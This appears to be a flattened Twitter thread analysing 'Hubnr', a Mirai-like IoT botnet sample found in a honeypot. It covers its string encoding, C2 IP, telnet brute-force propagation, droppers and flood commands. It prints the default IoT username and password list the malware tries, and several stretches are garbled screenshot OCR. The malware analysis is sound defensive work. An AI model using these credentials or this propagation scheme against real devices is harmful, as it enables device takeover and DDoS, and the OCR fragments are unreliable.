1/14 carbreal Hubnr Botnet github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet Today, april 3rd of 2021, I found the following sample in my honeypot: At first sight, it seems like a Mirai variant but has some interesting stuff. First, it doesn't encode the strings with an XOR function. It has two functions that do the job: util_encrypt() and util_decrypt() and they just apply a 3 character rotation to the strings. arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped hash: fe7fb996b997877216d782a7adbcbe6a37bc585d459c6d0d452a346b078157c6 https://github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/encdec.png 2/14 In the main function, we see the first util_decrypt() call. It decodes the variable proc_name, that returns "/dev/hubnr". Then, it runs the two main functions: hakka_con() and parse_buf(). hakka_con() connects to the server and runs scanner_init(). In order to get the master IP, it calls again util_decrypt() with the variable bot_host. This sample connects to the IP: 194.113.107.243 https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/procmem.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/procdec.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/main.png 3/14 scanner_init() is the function that propagates itself. I don't fully understand the entire logic behind this huge function, but I'd say that it works like a state machine. It has a for loop that iterates through a variable and a switch-case function that goes through each state. https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/hakka.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/ipvar.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/ipmem.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/ipdec.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_1.png 4/14 It has a state that runs a telnet scan and performs a bruteforce with a few stored credentials: https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_2.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_3.png 5/14 https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/credentialsmem.png Usernames: 74 af @1 88 7 74 ad @1 OO 74 a4 @1 80 7 a4 @1 808 7 a4 61 88 7« a4 81 OO a4 @1 20 a4 61 60 a4 @1 88 7 passwords: cc a4 61 66 ec 81 2 5 61 8@ : 5 61 66 Fi 5 @1 6@ 81 88 4 B1 88 B11 88 & B1 82 c oh ia mom io om 08 oo 7 oo ¢ 5/14 6/14 https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/credentials.png vL/9 o[Tos" TITMTSY ES - 2 “UTWPp se S4pb SMTU "pueTuf” * sess" a5n 0 ==: uUTWpe i 9 1) P9-ae 8=S°TE88 @PSFTeee A2GeT A088 Tee ET@G8 95° T8008 855° Tee BrSFTeae 68£S°TA88 H¢SF Tee BTSFTe8e 885° THe BFE THe e=7eTeee BPE Tee 7/14 https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/credentials_ord.png Usernames manager root default guest admin Admin user support telnetadmin Passwords root default telnetadmin friend solokey tOtalcOntrdl4! tsgoingon 12345 ViZXV 123456 xc3511 Zte521 ZLXxX. 5up OxhLwSG8 S2fTGqNFs 7ujMkoOadmin 1234 hslwificam uidd hipc3518 2601hx ho4uku6at taZz@0l 7/14 8/14 Then, if the login is successful, it runs some recon commands and depending on the output it gets the appropiate binary for the architecture. It has a few ways of getting the binary into the victim's machine: with a wget, a tftp or echoing it into the machine. Basically, this are the commands used in the different states: It has 5 different droppers embedded targeting 5 different architectures. It has a payloads variable that points to the memory direction of each dropper and it's used in the get_retrieve_binary() function inside the state. https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_4.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scancommands.png 9/14 The dropper is a very small binary that only retrieves the sample from the master. https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/payloadsmem.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/binarymem.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/droppers_bin.png 10/14 The other main function is parse_buf(). This one gets the command from the master. At the moment, it has 4 different options. A PING option, that just updates the master with the alive bots. "killproc" that kills the process. And two different attack capabilities: "udpflood" and "tcpflood". https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/droppers.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/dropper_diss.png 11/14 It's very interesting that it has also a http_send()+http_attack() function with 5 different user- agent in memory and the HTTP request is also stored. It's used in the http_attack() function and it uses 4 different variables that are empty at the moment. I asume that when the new https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/parse_buff_comp.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/parse_buff_mem.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/parse_buff_dec.png 12/14 functionality is implemented, the master will be able to select different payloads but it's not possible yet. https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_send.png 13/14 https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_attack.png vL/EL ASOHU\Y\T T/d L1H sanbau oO] pez "Taue x pee dyqy , 14/14 https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_attack_var.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_vars.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/useragentsmem.png https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/useragents_ord.png char const data_1a324[@xle] = “Sending B88 Be char const data_1a344[@x5] = "POST", 88 BB BE HTTP/1.1\ Sir\n , char const data_1 c| OxAt HTTP/1.1% “Host: % “User- “Conne 88029648 int32 t data 29648 A int3? t data 2964c int3?_t data_2965@ int32 t data 29654 useragents: e@ 9e @1 @0 2c OF G1 80-98 SF G1 80 O83 ad O1 00 6@ a@ @1 @8 c4 af G1 BO (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 (Windows NT 6.1; WOW64) AppleWebK. -5 (KHTML, like Gecko) Chrome/19.@.1 Mozilla/sS. 14/14